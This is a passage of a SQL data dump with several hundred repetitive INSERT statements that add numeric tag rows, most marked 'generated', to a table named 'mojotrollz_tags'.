`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10195, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10196, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10197, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10198, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10199, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10200, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10201, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10202, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10203, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10206, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10209, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10210, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10211, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10212, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10213, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10214, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10215, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10216, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10217, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10218, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10219, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10220, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10223, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10388, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11713, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11714, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12144, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12352, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12354, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12355, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12356, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12357, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12358, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12359, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12360, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12361, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12362, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12363, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12364, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12365, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12366, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12654, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12665, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12666, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12893, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12894, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12895, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12896, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12897, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12900, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12901, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12902, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12903, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12907, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12908, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12909, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13348, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13349, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13350, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13351, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13352, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13353, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13354, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13355, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13356, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13357, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13358, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13359, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13360, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13405, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13406, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13407, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13408, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13409, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13410, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13411, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13412, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13872, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13873, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13891, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13949, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13949, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13965, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13965, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15068, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15069, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16393, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16394, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16396, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16397, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16397, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16398, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16398, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16399, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16399, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16400, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16400, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17153, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17153, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17154, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17154, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17155, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17155, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17156, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17157, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17182, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17183, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17184, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17185, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17188, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17190, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17191, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17249, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17252, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17255, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17258, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17261, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17262, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17263, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17264, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17265, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17266, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17267, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17268, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17269, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17274, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17275, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17276, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17281, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17282, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17284, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17783, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18033, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18034, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18035, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18036, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18057, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18058, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18060, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18061, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18063, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18064, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18067, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18068, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18069, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18074, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18075, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18076, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18077, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18079, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18083, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18084, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18085, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18087, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18089, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18090, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18340, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18341, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18342, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18343, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18344, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18345, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18596, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18643, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18644, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18645, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18895, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18895, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18899, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18899, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18900, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18900, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18901, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18901, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18930, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18934, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18934, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18935, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18935, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18936, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18936, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18971, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18971, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18972, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18972, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18973, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18973, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19015, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19016, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19017, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19018, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19019, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19020, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19022, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19024, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19025, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19027, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19028, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19030, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19033, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19283, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19283, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19284, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19284, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19463, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19464, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19535, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 